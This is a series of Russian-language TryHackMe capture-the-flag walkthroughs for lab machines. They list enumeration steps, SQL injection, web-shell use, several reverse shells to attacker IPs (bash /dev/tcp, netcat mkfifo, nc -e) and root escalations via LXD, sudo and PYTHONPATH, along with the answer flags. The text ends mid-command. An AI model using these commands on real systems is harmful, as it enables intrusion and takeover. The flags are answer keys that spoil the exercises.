страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Flip](https://tryhackme.com/r/room/flip) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Сначала просмотрите исходный код, прежде чем переходить к заданию 2. 8 | 9 | Вы можете просмотреть исходный код, нажав кнопку «Загрузить файлы задания» в верхней части этого задания, чтобы 10 | загрузить требуемый файл. 11 | 12 | ### Ответьте на вопросы ниже 13 | Загрузите исходный код. 14 | ```commandline 15 | Ответ не нужен 16 | ``` 17 | 18 | ## Задание 2 19 | Войдите в систему как администратор и захватите флаг! 20 | 21 | Если вы можете... 22 | 23 | Когда будете готовы, нажмите кнопку Start Machine , чтобы запустить виртуальную машину. Пожалуйста, подождите 3-5 24 | минут, пока виртуальная машина полностью запустится. 25 | 26 | Сервер прослушивает порт 1337 через TCP. Вы можете подключиться к нему с помощью Netcat или любого другого 27 | инструмента, который вам нравится. 28 | 29 | ### Ответьте на вопросы ниже 30 | Что такое флаг? 31 | ```commandline 32 | THM{FliP_DaT_B1t_oR_G3t_Fl1pP3d} 33 | ``` 34 | 35 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/GLITCH.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [GLITCH](https://tryhackme.com/r/room/glitch) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Внимание! Коробка содержит мигающие изображения и деликатные слова. 8 | 9 | Это простая задача, в которой вам нужно эксплуатировать уязвимое веб-приложение и получить root-доступ к машине. Она ориентирована на новичков, некоторые базовые знания JavaScript будут полезны, но не обязательны. Отзывы всегда приветствуются. 10 | 11 | *Примечание: для фактического запуска веб-сервера может потребоваться несколько минут. 12 | 13 | ### Ответьте на вопросы ниже 14 | Разверните машину. 15 | ```commandline 16 | Ответ не нужен 17 | ``` 18 | Какой у вас токен доступа? 19 | ```commandline 20 | nmap -sC -sV 21 | curl -s http:///api/access 22 | echo "dGhpc19pc19ub3RfcmVhbA==" | base64 -d 23 | ``` 24 | ```commandline 25 | this_is_not_real 26 | ``` 27 | Каково содержимое файла user.txt? 28 | ```commandline 29 | gobuster dir -u http:///api/ -x php,txt,bak,old,tar,zip -w /usr/share/wordlists/dirb/common.txt 30 | curl http:///api/items 31 | curl -XPOST http:///api/items 32 | wfuzz -X POST -w /usr/share/wordlists/SecLists/Fuzzing/1-4_all_letters_a-z.txt --hh=45 http:///api/items?FUZZ=oops 33 | curl -X POST http:///api/items?cmd=id 34 | curl -X POST "http:///api/items?cmd=process.cwd()" 35 | curl -X POST "http:///api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/10.8.50.72/4444+0>%261"') 36 | nc -nlvp 4444 37 | cat /home/user/user.txt 38 | ``` 39 | ```commandline 40 | THM{i_don't_know_why} 41 | ``` 42 | Каково содержимое файла root.txt? 43 | ```commandline 44 | # https://github.com/unode/firefox_decrypt 45 | python3 firefox_decrypt.py /data/GLITCH/files/.firefox/ 46 | Username: 'v0id' 47 | Password: 'love_the_void' 48 | sudo -l 49 | find / -type f -user root -perm -u=s 2>/dev/null 50 | doas -u root /bin/bash 51 | cat /root/root.txt 52 | ``` 53 | ```commandline 54 | THM{diamonds_break_our_aching_minds} 55 | ``` 56 | 57 | 58 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Gallery.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Gallery](https://tryhackme.com/r/room/gallery666) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Наша галерея не очень хорошо охраняется. 8 | 9 | Разработано и создано Микаа ! 10 | 11 | ### Ответьте на вопросы ниже 12 | Сколько портов открыто? 13 | ```commandline 14 | nmap -sC -sV 15 | ``` 16 | ```commandline 17 | 2 18 | ``` 19 | Как называется CMS? 20 | ```commandline 21 | gobuster dir -u -w /opt/medium.txt 22 | http:///gallery/login.php 23 | ``` 24 | ```commandline 25 | Simple Image Gallery 26 | ``` 27 | Какой хеш-пароль у пользователя admin? 28 | ```commandline 29 | 'or 1=1 -- - 30 | sudo sqlmap -r test.req --dbs 31 | sqlmap -r test.req --current-db gallery_db --tables 32 | sqlmap -r test.req --current-db gallery_db -T users --columns 33 | sqlmap -r test.req --current-db gallery_db -T users -C username,password --dump 34 | ``` 35 | ```commandline 36 | a228b12a08b6527e7978cbe5d914531c 37 | ``` 38 | Что такое флаг пользователя? 39 | ```commandline 40 | searchsploit Simple Image Gallery 41 | cat .bash_history 42 | su mike 43 | cat user.txt 44 | ``` 45 | ```commandline 46 | THM{af05cd30bfed67849befd546ef} 47 | ``` 48 | 49 | ## Задание 2 50 | Удачи на последнем этапе! 51 | ### Ответьте на вопросы ниже 52 | Что такое корневой флаг? 53 | ```commandline 54 | sudo -l 55 | cat /opt/rootkit.sh 56 | sudo /bin/bash /opt/rootkit.sh 57 | ^R^X 58 | reset; sh 1>&0 2>&0 59 | id 60 | cat /root/root.txt 61 | ``` 62 | ```commandline 63 | THM{ba87e0dfe5903adfa6b8b450ad7567bafde87} 64 | ``` 65 | 66 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/GamingServer.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [GamingServer](https://tryhackme.com/r/room/gamingserver) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Можете ли вы получить доступ к этому игровому серверу, созданному любителями без опыта веб-разработки, и 8 | воспользоваться преимуществами системы развертывания? 9 | 10 | ### Ответьте на вопросы ниже 11 | Что такое флаг пользователя? 12 | 13 | ```commandline 14 | nmap -sC -sV 15 | ``` 16 | 17 | Итак, у нас есть сервер ssh, работающий на порту 22, и веб-сервер Apache, работающий на порту 80. Имя веб-сервера — 18 | «House of danak». Операционная система — Ubuntu. 19 | Просматривая исходный код веб-страницы, мы находим комментарий, который дает нам возможное имя пользователя «john». 20 | Перейдя в раздел « DRAAGAN LORE », мы увидим кнопку «Upload», на этот же каталог указывает файл /robots.txt. 21 | 22 | `http:///uploads/` 23 | Затем я запустил Gobuster для перебора всех доступных каталогов. При доступе к /secret. Там есть файл secretKey. При 24 | просмотре файла это зашифрованный ключ rsa, возьмем его и расшифруем при помощи уже найденного файла dict.lst 25 | ```commandline 26 | gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 27 | ssh2john secretKey > hash.txt 28 | john --wordlist=dict.lst hash.txt 29 | # letmein 30 | 31 | ssh -i secretKey john@ 32 | # letmein 33 | cat user.txt 34 | ``` 35 | ```commandline 36 | a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e 37 | ``` 38 | Что такое корневой флаг? 39 | ```commandline 40 | id 41 | wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine 42 | cd lxd-alpine-builder 43 | ./build-alpine 44 | ls 45 | ``` 46 | Далее нам нужно скопировать сжатый файл на целевую машину, а затем импортировать образ с помощью lxc 47 | ```commandline 48 | lxc image import ./alpine-* --alias myimage 49 | lxc image list 50 | lxc init myimage image -c security.privileged=true 51 | lxc config device add image mydevice disk source=/ path=/mnt/root recursive=true 52 | lxc exec image /bin/sh 53 | id 54 | cd /mnt/root/root/ 55 | cat root.txt 56 | ``` 57 | ```commandline 58 | 2e337b8c9f3aff0c2b3e8d4e6a7c88fc 59 | ``` 60 | 61 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Git Happens.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Git Happens](https://tryhackme.com/r/room/githappens) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Можете ли вы найти пароль к приложению? 8 | ### Ответьте на вопросы ниже 9 | Найдите суперсекретный пароль 10 | ```commandline 11 | nmap -sSV -sC 12 | gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt 13 | http://:80/.git 14 | ./gitdumper.sh http:///.git/ /data/Git_Happens/files/ 15 | git log 16 | git show 395e087334d613d5e423cdf8f7be27196a360459 17 | 18 | ``` 19 | ```commandline 20 | Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd! 21 | ``` 22 | 23 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Gotta Catch'em All!.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Gotta Catch'em All!](https://tryhackme.com/r/room/pokemon) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Не забудьте подключиться к сети VPN с помощью OpenVPN. Для правильного развертывания устройства может потребоваться 8 | некоторое время. 9 | 10 | Вы также можете развернуть собственную машину Kali Linux и управлять ею в своем браузере, используя предоставленную 11 | машину Kali (требуется подписка). 12 | 13 | Наслаждайтесь комнатой! 14 | 15 | ### Ответьте на вопросы ниже 16 | Найдите покемона травяного типа 17 | ```commandline 18 | nmap -sC -sV 19 | gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.30medium.txt 20 | # http:// 21 | pokemon:hack_the_pokemon 22 | ssh pokemon@ 23 | cd /Desktop 24 | ls -la 25 | unzip P0kEm0n.zip 26 | cd P0kemon 27 | cat grass-type.txt 28 | # HEX decoder 29 | ``` 30 | ```commandline 31 | PoKeMoN{Bulbasaur} 32 | ``` 33 | Найдите покемона водного типа 34 | ```commandline 35 | cd /var/www/html 36 | ls -la 37 | cat water-type.txt 38 | # Caesar Cipher Cryptography Algorithm shift : 14 39 | ``` 40 | ```commandline 41 | Squirtle_SqUaD{Squirtle} 42 | ``` 43 | Найдите покемона огненного типа 44 | ```commandline 45 | sudo -l 46 | sudo su 47 | locate fire-type.txt 48 | cd /etc/why_am_i_here 49 | cat fire-type.txt 50 | 51 | cat fire-type.txt | base-64 -d 52 | ``` 53 | ```commandline 54 | P0k3m0n{Charmander} 55 | ``` 56 | Кто любимый покемон Рута? 57 | ```commandline 58 | cat /home/roots-pokemon.txt 59 | ``` 60 | ```commandline 61 | Pikachu! 62 | ``` 63 | Поздравляю! Большое спасибо за прохождение Pokemon Room! 64 | ```commandline 65 | Ответ не нужен 66 | ``` 67 | 68 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Hacker vs. Hacker.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Hacker vs. Hacker](https://tryhackme.com/r/room/hackervshacker) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Сервер этой рекрутинговой компании, похоже, был взломан, и хакер свел на нет все попытки администраторов починить машину. Они не могут ее выключить (они потеряют SEO!), так что, может быть, вы сможете помочь? 8 | ### Ответьте на вопросы ниже 9 | Что такое флаг user.txt? 10 | ```commandline 11 | nmap -sC -sV 12 | gobuster dir --url http:// -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32 -x txt,php,html 13 | # http:///upload.php 14 | # http:///cvs/shell.pdf.php 15 | http:///cvs/shell.pdf.php?cmd=whoami 16 | http:///cvs/shell.pdf.php?cmd=cat /home/lachlan/user.txt 17 | ssh lachlan@ 18 | 19 | ``` 20 | ```commandline 21 | thm{af7e46b68081d4025c5ce10851430617} 22 | ``` 23 | Что такое флаг proof.txt? 24 | ```commandline 25 | http:///cvs/shell.pdf.php?cmd=ls -la /home/lachlan 26 | http:///cvs/shell.pdf.php?cmd=cat /home/lachlan/.bash_history 27 | http:///cvs/shell.pdf.php?cmd=cat /etc/cron.d/persistence 28 | echo "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f" > /home/lachlan/bin/pkill; chmod +x /home/lachlan/bin/pkill 29 | nc -lvnp 1234 30 | cat /root/root.txt 31 | ``` 32 | ```commandline 33 | thm{7b708e5224f666d3562647816ee2a1d4} 34 | ``` 35 | 36 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Hijack.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Hijack](https://tryhackme.com/r/room/hijack) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Взломайте машину и заберите флаги. 8 | 9 | Примечание: Подождите 3–5 минут, пока компьютер загрузится и настроится. 10 | 11 | ### Ответьте на вопросы ниже 12 | Что такое флаг пользователя? 13 | ```commandline 14 | THM{fdc8cd4cff2c19e0d1022e78481ddf36} 15 | ``` 16 | Что такое корневой флаг? 17 | ```commandline 18 | THM{b91ea3e8285157eaf173d88d0a73ed5a} 19 | ``` 20 | Аватар пользователя 21 | ```commandline 22 | 0utc4st 23 | ``` 24 | 25 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/How to use TryHackMe.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [How to use TryHackMe](https://tryhackme.com/r/room/howtousetryhackme) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | На TryHackMe вы научитесь взламывать машины 8 | Задания включают машины, которые помогут применить ваши знания на практике! 9 | 10 | ### Ответьте на вопросы ниже 11 | Запустите машину, нажав кнопку "Запустить машину". Эта машина - Linux, операционная система, о которой вы узнаете 12 | позже! Давайте сделаем краткий урок. 13 | ```commandline 14 | Ответ не нужен 15 | ``` 16 | Давайте перечислим, какие файлы и папки есть на вашей машине (справа). Мы можем сделать это, набрав "ls". Как 17 | называется папка, которую вы видите? 18 | ```commandline 19 | testdir 20 | ``` 21 | Подобно тому, как вы открываете папку на рабочем столе, вы можете изменить каталог (переместить папки), набрав "cd 22 | ". Перейдите в папку, которую вы только что нашли. 23 | ```commandline 24 | Ответ не нужен 25 | ``` 26 | Мы можем увидеть содержимое файлов, набрав "cat <имя_файла>". Перечислите файлы в папке, в которой вы находитесь, 27 | каково содержимое файла hello.txt? 28 | ```commandline 29 | hacking labs 30 | ``` 31 | Закончив работу с машиной в любой комнате, обязательно остановите ее, нажав красную кнопку «Завершить». 32 | ```commandline 33 | Ответ не нужен 34 | ``` 35 | 36 | ## Задание 2 37 | Теперь, когда вам удалось запустить машину TryHackMe, давайте приступим к взлому — присоединяйтесь к обучающему курсу: 38 | 39 | ### Ответьте на вопросы ниже 40 | Прочитайте вышеизложенное и изучите TryHackMe! 41 | ```commandline 42 | Ответ не нужен 43 | ``` 44 | 45 | 46 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/IDE.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [IDE](https://tryhackme.com/r/room/ide) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Получите ракушку на ящик и повысьте свои привилегии! 8 | 9 | ### Ответьте на вопросы ниже 10 | пользователь.txt 11 | ```commandline 12 | nmap -sCV -A -p- 13 | ftp 14 | ls -la 15 | cd ... 16 | ls -la 17 | more - 18 | # drac, john 19 | # password 20 | http://:62337 21 | # john:password 22 | searchsploit "codiad 2.8.4" 23 | python3 exploit.py http://:62337/ john password 1234 linux 24 | nc -lvnp 1235 25 | python3 -c 'import pty;pty.spawn("/bin/bash")' 26 | id 27 | ls -la 28 | cat .bash_history 29 | su drac 30 | # Th3dRaCULa1sR3aL 31 | cat user.txt 32 | ``` 33 | ```commandline 34 | 02930d21a8eb009f6d26361b2d24a466 35 | ``` 36 | корень.txt 37 | ```commandline 38 | sudo -l 39 | systemctl status vsfpd 40 | ls -al /lib/systemd/system/vsftpd.service 41 | vim /lib/systemd/system/vsftpd.service 42 | ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACK_IP/9003 0>&1 43 | nc -lvnp 9003 44 | sudo /usr/sbin/service vsftpd restart 45 | cat /root/root.txt 46 | ``` 47 | ```commandline 48 | ce258cb16f47f1c66f0b0b77f4e0fb8d 49 | ``` 50 | 51 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Ignite.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Ignite](https://tryhackme.com/r/room/ignite) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Root the box! Разработано и создано DarkStar7471 , построено Paradox . 8 | 9 | -------------------------------------------------- -- 10 | Наслаждайтесь комнатой! Для будущих комнат и статей подписывайтесь на @darkstar7471 в Twitter. 11 | 12 | Ответьте на вопросы ниже 13 | Пользователь.txt 14 | ```commandline 15 | 6470e394cbf6dab6a91682cc8585059b 16 | ``` 17 | Корень.txt 18 | ```commandline 19 | b9bbcb33e11b80be759c4e844862482d 20 | ``` 21 | 22 | 23 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Investigating Windows.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Investigating Windows](https://tryhackme.com/r/room/investigatingwindows) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Это именно та проблема, о которой говорится в ее названии: существует несколько проблем, связанных с расследованием взломанного ранее компьютера под управлением Windows. 8 | 9 | Подключитесь к машине с помощью RDP. Учетные данные машины следующие: 10 | 11 | Имя пользователя: Администратор 12 | Пароль: letmein123! 13 | 14 | Обратите внимание, что этот компьютер не отвечает на ping (ICMP) и его загрузка может занять несколько минут. 15 | 16 | ### Ответить на вопросы ниже 17 | Какая версия и год выпуска машины Windows? 18 | ```commandline 19 | Windows Server 2016 20 | ``` 21 | Какой пользователь вошел в систему последним? 22 | ```commandline 23 | Administrator 24 | ``` 25 | Когда Джон в последний раз заходил в систему? 26 | Формат ответа: ММ/ДД/ГГГГ Ч:ММ:СС AM/PM 27 | ```commandline 28 | 03/02/2019 5:48:32 PM 29 | ``` 30 | К какому IP-адресу подключается система при первом запуске? 31 | ```commandline 32 | 10.34.2.3 33 | ``` 34 | Какие две учетные записи имели административные привилегии (кроме пользователя «Администратор»)? 35 | Формат ответа: имя_пользователя1, имя_пользователя2 36 | ```commandline 37 | Jenny, Guest 38 | ``` 39 | Как называется запланированная вредоносная задача? 40 | ```commandline 41 | Clean file system 42 | ``` 43 | Какой файл задача пыталась запустить ежедневно? 44 | ```commandline 45 | nc.ps1 46 | ``` 47 | Какой порт этот файл прослушивал локально? 48 | ```commandline 49 | 1348 50 | ``` 51 | Когда Дженни в последний раз заходила в систему? 52 | ```commandline 53 | Never 54 | ``` 55 | Когда произошел компромисс? 56 | Формат ответа: ММ/ДД/ГГГГ 57 | ```commandline 58 | 03/02/2019 59 | ``` 60 | В какой момент времени во время взлома Windows впервые назначила особые привилегии новому входу в систему? 61 | Формат ответа: ММ/ДД/ГГГГ ЧЧ:ММ:СС AM/PM 62 | ```commandline 63 | 03/02/2019 4:04:49 PM 64 | ``` 65 | Какой инструмент использовался для получения паролей Windows? 66 | ```commandline 67 | Mimikatz 68 | ``` 69 | Какой IP-адрес был у внешних серверов управления и команд злоумышленников? 70 | ```commandline 71 | 76.32.97.132 72 | ``` 73 | Каково было название расширения оболочки, загруженной через веб-сайт сервера? 74 | ```commandline 75 | .jsp 76 | ``` 77 | Какой последний порт открыл злоумышленник? 78 | ```commandline 79 | 1337 80 | ``` 81 | Проверьте DNS-заражение. Какой сайт был атакован? 82 | ```commandline 83 | google.com 84 | ``` 85 | 86 | 87 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/JPGChat.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [JPGChat](https://tryhackme.com/r/room/jpgchat) 4 | 5 | Всего 1 заданий: 6 | ## Задание 1 7 | Взломайте машину и заберите флаг. 8 | 9 | ### Ответьте на вопросы ниже 10 | Создайте точку опоры и получите user.txt 11 | ```commandline 12 | nmap -sC -sV 13 | nc 3000 14 | [REPORT] 15 | https://raw.githubusercontent.com/Mozzie-jpg/JPChat/main/jpchat.py 16 | python3 -c "import pty;pty.spawn('/bin/bash')" 17 | mkdir .ssh 18 | cat > authorized_keys << EOF 19 | > ssh-rsa AAAAB3NzaC1yc2EAAAADAQA[REDACTED]5IKZVtD53kcT6xDO+m7pk= kali@kali 20 | > EOF 21 | EOF 22 | 23 | ssh wes@ 24 | ls -la 25 | cat user.txt 26 | ``` 27 | ```commandline 28 | JPC{487030410a543503cbb59ece16178318} 29 | ``` 30 | 31 | Повысьте свои привилегии до root и прочитайте root.txt 32 | ```commandline 33 | sudo -l 34 | ls -l /opt/development/test_module.py 35 | cat > compare.py << EOF 36 | > import os 37 | > os.system('/bin/bash') 38 | > EOF 39 | 40 | chmod +x compare.py 41 | export PYTHONPATH=/home/wes 42 | sudo /usr/bin/python3 /opt/development/test_module.py 43 | cat /root/root.txt 44 | ``` 45 | ```commandline 46 | JPC{665b7f2e59cf44763e5a7f070b081b0a} 47 | ``` 48 | 49 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Jack-of-All-Trades.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Jack-of-All-Trades](https://tryhackme.com/r/room/jackofalltrades) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Джек — человек с большим количеством талантов. Зоопарк нанял его для поимки пингвинов из-за его многолетнего опыта в 8 | этом деле, но все не так, как кажется... Мы должны остановить его! Сможете ли вы разглядеть его за маской 9 | забывчивого старого игрушечного мастера и уничтожить этого психа? 10 | 11 | ### Ответьте на вопросы ниже 12 | Пользовательский флаг 13 | ```commandline 14 | nmap -sC -sV 15 | curl -s http:/ 16 | echo "UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==" | base64 -d 17 | # u?WtKSraq 18 | steghide info header.jpg 19 | steghide extract -sf header.jpg 20 | cat cms.creds 21 | Username: jackinthebox 22 | Password: TplFxiSHjY 23 | 24 | curl -s http://:22/recovery.php 25 | 26 | echo "GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=" | base32 -d | xxd -r -p | tr 'A-Za-z' 'N-ZA-Mn-za-m' 27 | # bit.ly/2TvYQ2S 28 | # http://:22/recover.php 29 | jackinthebox:TplFxiSHjY 30 | # http://:22/nnxhweOV/index.php 31 | nc -nlvp 4444 32 | http://:22/nnxhweOV/index.php?cmd=nc%20-e%20/bin/bash%20%2080%204444 33 | ls 34 | cd /home 35 | ls 36 | wc -l jacks_password_list 37 | cat jacks_password_list 38 | hydra -l jack -P jacks_password_list -s 80 ssh 39 | # login: jack password: ITMJpGGIqg1jn?>@ 40 | ssh jack@ -p 80 41 | user.jpg 42 | ``` 43 | ```commandline 44 | securi-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3} 45 | ``` 46 | Корневой флаг 47 | ```commandline 48 | find / -type f -user root -perm -u=s 2>/dev/null 49 | strings /root/root.txt 50 | ``` 51 | ```commandline 52 | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} 53 | ``` 54 | 55 | 56 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Jax sucks alot..............md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Jax sucks alot.............](https://tryhackme.com/r/room/jason) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Мы Horror LLC, мы специализируемся на ужасах, но один из самых страшных аспектов нашей компании — это наш фронтенд-сервер. Мы не можем запустить наш сайт в его текущем состоянии, и уровень нашей обеспокоенности относительно нашей кибербезопасности растет экспоненциально. Мы просим вас провести тщательный тест на проникновение и попытаться скомпрометировать учетную запись root. Для этого взаимодействия нет никаких правил. Удачи! 8 | 9 | Спасибо @Luma за тестирование комнаты. 10 | 11 | Примечание: эта коробка была частью конкурса, в котором разыгрывались 12 купонов на подписку на месяц (любезно предоставленных @RobertArthurBT ). Победители были выбраны случайным образом из списка пользователей без подписки, которые завершили эту комнату до 9 вечера по британскому летнему времени 11 октября 2021 года. 12 | 13 | Конкурс завершен. Результаты были объявлены на Discord-сервере TryHackMe. 14 | 15 | ### Ответьте на вопросы ниже 16 | пользователь.txt 17 | ```commandline 18 | 0ba48780dee9f5677a4461f588af217c 19 | ``` 20 | корень.txt 21 | ```commandline 22 | 2cd5a9fd3a0024bfa98d01d69241760e 23 | ``` 24 | 25 | 26 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/KoTH Food CTF.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [KoTH Food CTF](https://tryhackme.com/r/room/kothfoodctf) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Это место для одного из автоматов King of the Hill, FoodCTF. Захватите еду и все флаги, пока вы там. 8 | 9 | Вы можете получить доступ к официальной статье, нажав «Параметры» (вверху справа), а затем «Статьи». 10 | 11 | Этот ящик был из ротации KoTH за апрель 2020 года. Он не дает никаких очков, так как текущая система вопросов не 12 | позволяет мне этого делать. 13 | 14 | ### Ответьте на вопросы ниже 15 | Получите все 8 флагов. 16 | ```commandline 17 | Ответ не нужен 18 | ``` 19 | 20 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/LazyAdmin.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [LazyAdmin](https://tryhackme.com/r/room/lazyadmin) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Развлекайтесь! Может быть несколько способов получить доступ пользователя. 8 | 9 | ### Ответить на вопросы ниже 10 | Что такое флаг пользователя? 11 | ```commandline 12 | nmap -sC -sV $IP 13 | gobuster dir -u $IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 14 | gobuster dir -u $IP/content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 15 | wget http://$IP/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql 16 | cat mysql_bakup_20191129023059-1.5.1.sql 17 | # 42f749ade7f9e195bf475f37a44cafcb 18 | # https://crackstation.net/ 19 | # Password123 20 | 21 | # $IP/content/as 22 | Username: manager 23 | Password: Password123 24 | 25 | # reverse shell php for CMS sweetrice 1.5.1 26 | nc -nlvp 1234 27 | 28 | $ whoami 29 | www-data 30 | $ cd /home 31 | $ ls 32 | itguy 33 | $ cd itguy 34 | $ ls 35 | Desktop 36 | Documents 37 | Downloads 38 | Music 39 | Pictures 40 | Public 41 | Templates 42 | Videos 43 | backup.pl 44 | examples.desktop 45 | mysql_login.txt 46 | user.txt 47 | $ cat user.txt 48 | THM{63e5bce9271952aad1113b6f1ac28a07} 49 | ``` 50 | ```commandline 51 | THM{63e5bce9271952aad1113b6f1ac28a07} 52 | ``` 53 | Что такое корневой флаг? 54 | ```commandline 55 | $ sudo -l 56 | Matching Defaults entries for www-data on THM-Chal: 57 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 58 | 59 | User www-data may run the following commands on THM-Chal: 60 | (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl 61 | 62 | $ ls -l 